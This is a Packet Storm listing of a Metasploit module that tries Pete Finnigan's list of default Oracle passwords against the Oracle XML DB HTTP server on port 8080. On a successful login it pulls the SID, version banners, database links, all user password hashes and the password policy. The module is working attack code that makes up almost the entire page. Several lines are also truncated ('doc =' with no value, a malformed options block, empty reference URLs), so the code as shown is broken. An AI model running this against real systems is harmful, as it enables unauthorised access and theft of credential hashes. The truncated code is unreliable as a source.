

Oracle XML DB SID Discovery Via Brute Force

This Metasploit module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigans default oracle password list.

Packet Storm
### This module requires Metasploit: Current source: MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Oracle XML DB SID Discovery via Brute Force',      'Description' => %q{          This module attempts to retrieve the sid from the Oracle XML DB httpd server,          utilizing Pete Finnigan's default oracle password list.      },      'References'  =>        [          [ 'URL', '' ],          [ 'URL', ''],        ],      'Author'      => [ 'nebulus' ],      'License'     => MSF_LICENSE    )    register_options(        ['CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),          Opt::RPORT(8080),        ])  end  def run_host(ip)    begin    res = send_request_raw({      'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',      'version' => '1.0',      'method'  => 'GET'    }, 5)    return if not res    if(res.code == 200)      vprint_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code}) is not password protected.")      return    elsif(res.code == 403 || res.code == 401)      print_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code})")    end    list = datastore['CSVFILE']    users = []    fd = CSV.foreach(list) do |brute|      dbuser = brute[2].downcase      dbpass = brute[3].downcase      user_pass = "#{dbuser}:#{dbpass}"      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',        'version' => '1.0',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, 10)      if( not res )        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")        next      end      if (res.code == 200)        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0]        report_note(          :host => ip,          :proto  => 'tcp',          :port => datastore['RPORT'],          :type => 'SERVICE_NAME',          :data => sid,          :update => :unique_data        )        print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}")        users.push(user_pass)      else        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")      end    end #fd.each    good = false    users.each do |user_pass|      (u,p) = user_pass.split(':')      # get versions      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/PRODUCT_COMPONENT_VERSION',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc =          print_good("Version Information ==> as #{u}")          doc.elements.each('PRODUCT_COMPONENT_VERSION/ROW') do |e|            p = e.elements['PRODUCT'].get_text            v = e.elements['VERSION'].get_text            s = e.elements['STATUS'].get_text            report_note(              :host => datastore['RHOST'],              :sname => 'xdb',              :proto => 'tcp',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{p}#{v}",              :update => :unique_data            )            print_good("\t#{p}\t\t#{v}\t(#{s})")          end        end      end      # More version information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_REGISTRY_BANNERS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc =          doc.elements.each('ALL_REGISTRY_BANNERS/ROW') do |e|            next if e.elements['BANNER'] == nil            b = e.elements['BANNER'].get_text            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{b}",              :update => :unique_data            )            print_good("\t#{b}")          end        end      end      # database links      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_DB_LINKS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc =          print_good("Database Link Information ==> as #{u}")          doc.elements.each('ALL_DB_LINKS/ROW') do |e|            next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil)            h = e.elements['HOST'].get_text            d = e.elements['DB_LINK'].get_text            us = e.elements['USERNAME'].get_text            sid = h.to_s.scan(/\(SID\s\=\s(\S+)\)\)\)/)[0]            if(h.to_s.match(/^\(DESCRIPTION/) )              h = h.to_s.scan(/\(HOST\s\=\s(\S+)\)\(/)[0]            end            if(sid and sid != "")              print_good("\tLink: #{d}\t#{us}\@#{h[0]}/#{sid[0]}")              report_note(                :host => h[0],                :proto => 'tcp',                :port => datastore['RPORT'],                :sname => 'xdb',                :type => 'oracle_sid',                :data => sid,                :update => :unique_data              )            else              print_good("\tLink: #{d}\t#{us}\@#{h}")            end          end        end      end      # get users      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/DBA_USERS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc =        print_good("Username/Hashes on #{ip}:#{datastore['RPORT']} ==> as #{u}")        doc.elements.each('DBA_USERS/ROW') do |user|          us = user.elements['USERNAME'].get_text          h = user.elements['PASSWORD'].get_text          as = user.elements['ACCOUNT_STATUS'].get_text          print_good("\t#{us}:#{h}:#{as}")          good = true          if(as.to_s == "OPEN")            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Active Account #{u}:#{h}:#{as}",              :update => :unique_data            )          else            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Disabled Account #{u}:#{h}:#{as}",              :update => :unique_data            )          end        end      end      # get password information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/USER_PASSWORD_LIMITS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc =        print_good("Password Policy ==> as #{u}")        fla=plit=pgt=prt=prm=plot=''        doc.elements.each('USER_PASSWORD_LIMITS/ROW') do |e|          next if e.elements['RESOURCE_NAME'] == nil          case            when(e.elements['RESOURCE_NAME'].get_text == 'FAILED_LOGIN_ATTEMPTS')              fla = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LIFE_TIME')              plit = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_TIME')              prt = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_MAX')              prm = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LOCK_TIME')              plot = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_GRACE_TIME')              pgt = e.elements['LIMIT'].get_text          end        end        print_good(          "\tFailed Login Attempts: #{fla}\n\t" +          "Password Life Time: #{plit}\n\t" +          "Password Reuse Time: #{prt}\n\t" +          "Password Reuse Max: #{prm}\n\t" +          "Password Lock Time: #{plot}\n\t" +          "Password Grace Time: #{pgt}"        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Maximum Reuse Time: #{prm}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Reuse Time: #{prt}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Life Time: #{plit}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Fail Logins Permitted: #{fla}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Lockout Time: #{plot}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Password Grace Time: #{pgt}",          :update => :unique_data        )      end      break if good    end # users.each    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  endend

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